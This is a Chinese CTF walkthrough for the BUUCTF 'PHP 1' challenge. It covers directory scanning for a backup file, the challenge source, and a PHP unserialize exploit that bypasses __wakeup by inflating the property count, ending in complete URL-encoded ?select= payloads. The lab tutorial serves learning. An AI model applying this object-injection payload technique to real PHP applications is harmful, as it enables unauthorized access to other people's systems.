BUUCTF [极客大挑战 2019]PHP 1
BUUCTF [极客大挑战 2019]PHP 1-刷题日记
进去后是这样:
![BUUCTF [极客大挑战 2019]PHP 1_第1张图片](http://img.e-com-net.com/image/info8/188672ebcc2f41cb9092f9cf41d302a6.jpg)
提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。
py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt
-u+地址 -e选择语言 -w选择字典
![BUUCTF [极客大挑战 2019]PHP 1_第2张图片](http://img.e-com-net.com/image/info8/de7d1fa335e04793a1b373828fa798ca.jpg)
要多试几次,有时扫不出来,真的坑。(御剑更坑!)
输入进网址,把压缩包下载下来,打开都看看,但只有index.php,class.php有用
![BUUCTF [极客大挑战 2019]PHP 1_第3张图片](http://img.e-com-net.com/image/info8/515886ef69a04f48b8fcc278bd1d230b.jpg)
![BUUCTF [极客大挑战 2019]PHP 1_第4张图片](http://img.e-com-net.com/image/info8/855719ff40994180acd149cf18be1cf9.jpg)
![BUUCTF [极客大挑战 2019]PHP 1_第5张图片](http://img.e-com-net.com/image/info8/fb3406a5026c4c968ad3afd2fb8f2b61.jpg)
所以页面可以传进一个参数select然后把它反序列化,反序列化的过程中会用到class.php
class.php:
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "NO!!!hacker!!!";
echo "You name is: ";
echo $this->username;echo "";
echo "You password is: ";
echo $this->password;echo "";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "hello my friend~~sorry i can't give you the flag!";
die();
}
}
}
?>
我们要调用到__destruct()并且password=100,username=admin才能echo $flag
怎么调用到它呢?其实不用我们动手,在反序列化脚本结束时会自动调用它,它是unserialize()结束的魔术方法(魔法函数)
引用:浅谈反序列漏洞
魔法函数
通常来说有一些PHP的魔法函数会导致反序列化漏洞,如:
__construct 当一个对象创建时自动调用
__destruct 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)
__sleep() 使**用serialize()函数时触发
__wakeup 使用unserialse()**函数时会自动调用
__toString 当一个对象被当作一个字符串被调用。
__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于从不可访问的属性读取数据//调用私有属性时使用
__set() 用于将数据写入不可访问的属性
__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__toString() 把类当作字符串使用时触发,返回值需要为字符串
__invoke() 当脚本尝试将对象调用为函数时触发
构造序列化,php代码:
<?php
class Name
{
private $username = "yesyesyes";
private $password = "nonono";
public function __construct($username,$password)
{
$this->username=$username;
$this->password=$password;
}
}
$a = new Name(@admin,100);
//var_dump($a);
//echo "
";
$b = serialize($a);
echo $b."
";//输出序列化
echo urlencode($b);//输出url编码后的序列化
?>
序列化后是这样的:
O:4:"Name":2:{
s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
调用unserialize()时会自动调用魔法函数wakeup(),可以通过改变属性数绕过,把Name后面的2改为3或以上即可
O:4:"Name":3:{
s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
然后url识别不了",改为%22
O:4:%22Name%22:3:{
s:14:%22Nameusername%22;s:5:%22admin%22;s:14:%22Namepassword%22;i:100;}
因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。因为生产序列化时不会把这个空也输出。
O:4:%22Name%22:3:{
s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
完整payload:
?select=O:4:%22Name%22:3:{
s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
也可以直接用序列化后的url编码。这里要注意,php的urlencode()是会自动把空编码成%00,而Python的parse.quote()不会(php果然是世界上最好的语言~【狗头】)。
编码后一样要把属性2改为3或以上。
没改前
?select=O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
改后
?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
![BUUCTF [极客大挑战 2019]PHP 1_第6张图片](http://img.e-com-net.com/image/info8/3db1bcae1a5e47d9a20dcf800d2ff59c.jpg)
参考
浅谈反序列漏洞
[极客大挑战 2019]PHP 1
CTF-Web-极客大挑战 2019PHP